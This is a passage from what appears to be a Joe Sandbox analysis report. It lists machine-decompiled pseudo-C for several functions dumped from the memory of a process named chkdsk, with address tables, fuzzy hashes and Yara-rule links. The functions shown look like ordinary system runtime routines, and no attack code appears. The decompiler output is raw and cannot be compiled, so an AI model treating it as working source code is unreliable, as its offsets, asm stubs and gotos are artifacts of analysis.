								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04DA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04DCF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04DA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                      0x04e5740d
                                                      0x04e5740d
                                                      0x04e57412
                                                      0x04e57413
                                                      0x04e57416
                                                      0x04e57418
                                                      0x04e5741c
                                                      0x04e5741f
                                                      0x04e57422
                                                      0x04e57422
                                                      0x04e57428
                                                      0x04e5742a
                                                      0x04e5742a
                                                      0x04e57451
                                                      0x04e57432
                                                      0x04e5744f
                                                      0x04e5744f
                                                      0x00000000
                                                      0x04e57434
                                                      0x04e57438
                                                      0x04e57443
                                                      0x04e57517
                                                      0x04e57517
                                                      0x04e5751a
                                                      0x04e57535
                                                      0x04e57520
                                                      0x04e57527
                                                      0x04e5752c
                                                      0x04e57531
                                                      0x04e57533
                                                      0x00000000
                                                      0x04e57533
                                                      0x00000000
                                                      0x04e57531
                                                      0x04e5754b
                                                      0x04e5754f
                                                      0x04e5755c
                                                      0x04e5755c
                                                      0x04e5755f
                                                      0x04e57560
                                                      0x04e57561
                                                      0x04e57562
                                                      0x04e57563
                                                      0x04e57568
                                                      0x04e5756a
                                                      0x04e5756c
                                                      0x04e5756d
                                                      0x04e5756d
                                                      0x04e5756f
                                                      0x04e57572
                                                      0x04e57574
                                                      0x04e57577
                                                      0x04e5757c
                                                      0x04e5757f
                                                      0x00000000
                                                      0x04e57551
                                                      0x04e57551
                                                      0x04e57551
                                                      0x04e57553
                                                      0x04e57553
                                                      0x04e57449
                                                      0x04e57449
                                                      0x04e5744c
                                                      0x04e5744c
                                                      0x00000000
                                                      0x04e5744c
                                                      0x04e57443
                                                      0x04e5750e
                                                      0x04e57514
                                                      0x04e57514
                                                      0x04e57455
                                                      0x04e57469
                                                      0x04e5746d
                                                      0x00000000
                                                      0x04e57473
                                                      0x04e57473
                                                      0x04e57476
                                                      0x04e57480
                                                      0x04e57484
                                                      0x04e5748e
                                                      0x04e57493
                                                      0x04e57493
                                                      0x04e57496
                                                      0x04e57499
                                                      0x04e574a1
                                                      0x04e574b1
                                                      0x04e574b5
                                                      0x00000000
                                                      0x04e574bb
                                                      0x04e574c1
                                                      0x04e574c1
                                                      0x04e574c4
                                                      0x04e574c5
                                                      0x04e574c6
                                                      0x04e574c7
                                                      0x04e574c8
                                                      0x04e574cd
                                                      0x00000000
                                                      0x04e574d3
                                                      0x04e574d3
                                                      0x04e574d6
                                                      0x04e574d8
                                                      0x04e574db
                                                      0x04e574dd
                                                      0x04e574e0
                                                      0x04e574e7
                                                      0x04e574ee
                                                      0x04e574ee
                                                      0x04e574f4
                                                      0x04e574f9
                                                      0x00000000
                                                      0x04e574fb
                                                      0x04e574fb
                                                      0x04e574fd
                                                      0x04e57500
                                                      0x04e57503
                                                      0x04e57505
                                                      0x04e57505
                                                      0x04e574f9
                                                      0x00000000
                                                      0x04e574cd
                                                      0x04e574b5
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                      • Instruction ID: f57346c10aad3013031a2b84b3cdb3d53c86c2443a368d8744f5c2c92581a68d
                                                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                      • Instruction Fuzzy Hash: C8516B71A00606EFDB15CF54C480A96BBB5FF45308F19C1AAE9089F262E371F956CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB2990 Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E04DB2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4e5ff00);
				E04DDD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4d61664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E04DCE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4d61668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E04E051BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4d6166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04DB2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04D96600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04DB2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04DB2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04DB2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04DB2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E04DDD0D1(_t62);
				goto L28;
			}





















                                                      0x04db2990
                                                      0x04db2992
                                                      0x04db2997
                                                      0x04db29a3
                                                      0x04db29a6
                                                      0x04db29ab
                                                      0x04db29ad
                                                      0x04db29b2
                                                      0x04df5c80
                                                      0x04db29b8
                                                      0x04db29b8
                                                      0x04db29bb
                                                      0x04db29c0
                                                      0x04db29c5
                                                      0x04db29c6
                                                      0x04db29c6
                                                      0x04db29cb
                                                      0x00000000
                                                      0x00000000
                                                      0x04db29cd
                                                      0x04db29d0
                                                      0x04db29d9
                                                      0x04db29db
                                                      0x04db29dd
                                                      0x04db2a7f
                                                      0x04db2a84
                                                      0x04db2a87
                                                      0x04db2a89
                                                      0x04df5ca1
                                                      0x04df5ca3
                                                      0x00000000
                                                      0x04db2a8f
                                                      0x04db2a8f
                                                      0x00000000
                                                      0x04db2a8f
                                                      0x00000000
                                                      0x04db29e3
                                                      0x04db29e3
                                                      0x04db29e3
                                                      0x00000000
                                                      0x04db29e3
                                                      0x04db29dd
                                                      0x00000000
                                                      0x04db29db
                                                      0x04db29e6
                                                      0x04db29e9
                                                      0x04db29eb
                                                      0x04db29ed
                                                      0x04db29f3
                                                      0x04db29f5
                                                      0x04db29f8
                                                      0x04db29fa
                                                      0x04db2a97
                                                      0x04db2a9a
                                                      0x04db2a9d
                                                      0x04db2add
                                                      0x00000000
                                                      0x04db2a9f
                                                      0x04db2aa2
                                                      0x04db2aa5
                                                      0x04db2aa8
                                                      0x04db2aab
                                                      0x04df5cab
                                                      0x04df5caf
                                                      0x04df5cc5
                                                      0x04df5cda
                                                      0x04df5cdc
                                                      0x04df5cdf
                                                      0x04df5ce5
                                                      0x00000000
                                                      0x04df5ceb
                                                      0x04df5ced
                                                      0x04df5cee
                                                      0x00000000
                                                      0x04df5cee
                                                      0x04df5cb1
                                                      0x04df5cb4
                                                      0x04df5cb9
                                                      0x04df5cbb
                                                      0x00000000
                                                      0x04df5cbd
                                                      0x04df5cbd
                                                      0x00000000
                                                      0x04df5cbd
                                                      0x04df5cbb
                                                      0x04db2ab1
                                                      0x04db2ab1
                                                      0x04db2ac4
                                                      0x04db2ac6
                                                      0x04db2ac6
                                                      0x00000000
                                                      0x04db2ac6
                                                      0x04db2aab
                                                      0x00000000
                                                      0x04db2a00
                                                      0x04db2a09
                                                      0x04db2a0e
                                                      0x04db2a21
                                                      0x04db2a24
                                                      0x04db2a35
                                                      0x04db2a3a
                                                      0x04db2a3d
                                                      0x04db2a42
                                                      0x04db2a59
                                                      0x04db2a59
                                                      0x04db2a5c
                                                      0x04db2a5f
                                                      0x04db2a5f
                                                      0x04db29fa
                                                      0x04db29f3
                                                      0x04db2a64
                                                      0x04db2a64
                                                      0x04db2a6b
                                                      0x04db2a6b
                                                      0x04db2a6d
                                                      0x04db2a72
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f652abb7e40462e0ef09d759181a8fcd1cce60f532b85de3ed2f8856c6acaef
                                                      • Instruction ID: ac2993cc67b8ef72b2d3da26ecc17102cd89948f0aa925b02e9be015d0c23735
                                                      • Opcode Fuzzy Hash: 2f652abb7e40462e0ef09d759181a8fcd1cce60f532b85de3ed2f8856c6acaef
                                                      • Instruction Fuzzy Hash: 50514672A00209EFDF25DF55C884ADEBBB5FF48314F118095E856AB260D335E952DBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB4D3B Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E04DB4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4e7d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04DCFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4e77bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04DCB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04DA4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04D8CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04DCB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04DCF380(_t67 + 0xc, 0x4d65138, 0x10) == 0) {
								 *0x4e760d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04DB4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04DB4E70(0x4e786b0, 0x4db5690, 0, 0) != 0) {
					_t46 = E04D8CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                      0x04db4d3b
                                                      0x04db4d4d
                                                      0x04db4d53
                                                      0x04db4d58
                                                      0x04db4d65
                                                      0x04db4d6c
                                                      0x04db4d71
                                                      0x04db4d77
                                                      0x04db4d7f
                                                      0x04db4d8c
                                                      0x04db4d8e
                                                      0x04db4dad
                                                      0x04db4db0
                                                      0x04db4db7
                                                      0x04db4db8
                                                      0x04db4db9
                                                      0x04db4dba
                                                      0x04db4dbb
                                                      0x04db4dc1
                                                      0x04db4dc8
                                                      0x04db4dcc
                                                      0x04db4dd5
                                                      0x04db4dde
                                                      0x04db4ddf
                                                      0x04db4de0
                                                      0x04db4de1
                                                      0x04db4de6
                                                      0x04db4de7
                                                      0x04db4de9
                                                      0x04db4df3
                                                      0x00000000
                                                      0x00000000
                                                      0x04df6c7c
                                                      0x04df6c8a
                                                      0x04df6c8a
                                                      0x04df6c9d
                                                      0x04df6ca7
                                                      0x04df6cac
                                                      0x04df6cb2
                                                      0x04df6cb9
                                                      0x00000000
                                                      0x04df6cbf
                                                      0x04df6cbf
                                                      0x00000000
                                                      0x04df6cbf
                                                      0x04df6cb9
                                                      0x04db4dfb
                                                      0x04df6ccf
                                                      0x04df6cd3
                                                      0x04db4e32
                                                      0x04db4e39
                                                      0x04df6ce0
                                                      0x04df6cf2
                                                      0x04df6cf2
                                                      0x04df6ce0
                                                      0x04db4e3f
                                                      0x04db4e41
                                                      0x04db4e51
                                                      0x04db4e51
                                                      0x04db4e03
                                                      0x04db4e03
                                                      0x04db4e09
                                                      0x04db4e0f
                                                      0x04db4e57
                                                      0x00000000
                                                      0x00000000
                                                      0x04db4e1b
                                                      0x04db4e30
                                                      0x04db4e5b
                                                      0x04db4e5b
                                                      0x00000000
                                                      0x04db4e30
                                                      0x04db4e11
                                                      0x04db4e11
                                                      0x04db4e16
                                                      0x00000000
                                                      0x04db4e16
                                                      0x04db4e01
                                                      0x00000000
                                                      0x04db4e01
                                                      0x04db4da5
                                                      0x04df6c6b
                                                      0x00000000
                                                      0x04db4dab
                                                      0x04db4dab
                                                      0x00000000
                                                      0x04db4dab

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d65833630ad967332dd986e4af92be74a9e32522249d1696450575899d358bf8
                                                      • Instruction ID: a8f855f5f3f30a62629df4f8aa3ff8c658b38bfcb70ac1ce241de144ca076e51
                                                      • Opcode Fuzzy Hash: d65833630ad967332dd986e4af92be74a9e32522249d1696450575899d358bf8
                                                      • Instruction Fuzzy Hash: 6F41AF71B40318EFEB21DF14DD81FAAB7A9EB44614F00409AE9869B281E774FD44CAA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB4BAD Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E04DB4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4e7d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E04D8CC50(_t86);
					L11:
					return E04DCB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4e78504
				E04DA2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E04DCFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E04DCB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04DA4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E04D8CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4e78504
								E04D9FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04DB4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                      0x04db4bad
                                                      0x04db4bbf
                                                      0x04db4bc2
                                                      0x04db4bc6
                                                      0x04db4bcd
                                                      0x04db4bd9
                                                      0x04df67fe
                                                      0x04df6800
                                                      0x04db4ccc
                                                      0x04db4ccd
                                                      0x04db4cb7
                                                      0x04db4cc9
                                                      0x04db4cc9
                                                      0x04db4bdf
                                                      0x04db4be5
                                                      0x00000000
                                                      0x00000000
                                                      0x04db4beb
                                                      0x04db4bef
                                                      0x00000000
                                                      0x00000000
                                                      0x04db4bf5
                                                      0x04db4bf9
                                                      0x04db4c06
                                                      0x04db4c0b
                                                      0x04db4c17
                                                      0x04db4c1c
                                                      0x04db4c1f
                                                      0x04db4c25
                                                      0x04db4c33
                                                      0x04db4c3d
                                                      0x04db4c40
                                                      0x04db4c43
                                                      0x04db4c47
                                                      0x04db4c4d
                                                      0x04db4c53
                                                      0x04db4c54
                                                      0x04db4c55
                                                      0x04db4c56
                                                      0x04db4c5b
                                                      0x04db4c5c
                                                      0x04db4c63
                                                      0x04db4c6b
                                                      0x00000000
                                                      0x00000000
                                                      0x04df6776
                                                      0x04df6784
                                                      0x04df6784
                                                      0x04df679f
                                                      0x04df67a7
                                                      0x04df67af
                                                      0x04df67ce
                                                      0x00000000
                                                      0x04df67b1
                                                      0x04df67b7
                                                      0x04df67b8
                                                      0x04df67c1
                                                      0x04df67d3
                                                      0x04df67d9
                                                      0x04df67dd
                                                      0x04db4c94
                                                      0x04db4c94
                                                      0x04db4c98
                                                      0x04db4c9c
                                                      0x04db4ca3
                                                      0x04df67f4
                                                      0x04df67f4
                                                      0x04db4cb5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04db4cb5
                                                      0x04db4c79
                                                      0x04db4c7e
                                                      0x04db4c89
                                                      0x04db4c8b
                                                      0x04db4c8f
                                                      0x04db4c8f
                                                      0x00000000
                                                      0x04db4c89
                                                      0x04df67c3
                                                      0x00000000
                                                      0x04df67c3
                                                      0x04df67af
                                                      0x04db4c73
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2aac44034a711586eba948f58d0496fcc023768a2cef429e42cf1eaed94ca5f7
                                                      • Instruction ID: ce6b149fa58acd12f2ed17ae5c2004daf4ef759470bd5dad61971b8caf769d0e
                                                      • Opcode Fuzzy Hash: 2aac44034a711586eba948f58d0496fcc023768a2cef429e42cf1eaed94ca5f7
                                                      • Instruction Fuzzy Hash: 27418F35A00628DADB31DF64CD40BEAB7B4FF45B10F0101A9E949AB641DB74EE85CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D98A0A Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E04D98A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4e7d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E04DCB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E04D9E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4d61180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04DB1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04DC3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04D98999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
